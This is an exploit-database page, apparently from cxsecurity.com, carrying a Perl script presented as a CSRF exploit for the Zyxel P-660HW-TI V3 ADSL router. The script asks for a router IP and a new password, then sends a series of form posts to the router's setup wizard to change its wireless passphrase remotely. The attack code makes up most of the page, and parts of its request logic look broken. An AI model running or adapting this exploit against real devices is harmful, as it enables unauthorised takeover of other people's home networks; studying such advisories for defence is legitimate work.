Zyxel P-660HW-TI V3 ADSL CSRF ( change password )

2018.02.03
ir GIST (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl ########################################################### # Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password ) # Author : dr-iman/GIST # Exploit Type : Perl/Remote # Date : 3 Feb 2018 # Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3 # Tested : Ubuntu - Windows 10 # GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X ########################################################### # Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless. # The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field # Items needed : Wirelesss ADSL IP , NeW Password # There Is 3 Update For This ADSL Router . All versions are vulnerable use LWP::Simple; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); use HTTP::Request::Common qw(GET); use IO::Socket; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _____ _ _____ _ _ _ |__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _| |_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_| |___| |_| logo print "\nEner IP Address : "; $ip=<>; chomp($ip); print "\nEnter New Passwword : "; $pass=<>; chomp($pass); $url = "$ip/wzPPP.html"; my $content = $ua->get("$url")->content; if ($content =~ /Internet Configuration/ ) { my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]); } my $content = $ua->get("$wan")->content; my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]); my $content = $ua->get("$wan2")->content; my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]); my $content = $ua->get("$lan")->content; my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]); if ($fin =~ /Congratulations/) { print "\nPassword Changed Successfully !\n"; } else{ print "\nProcess Failed !!\n"; }


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top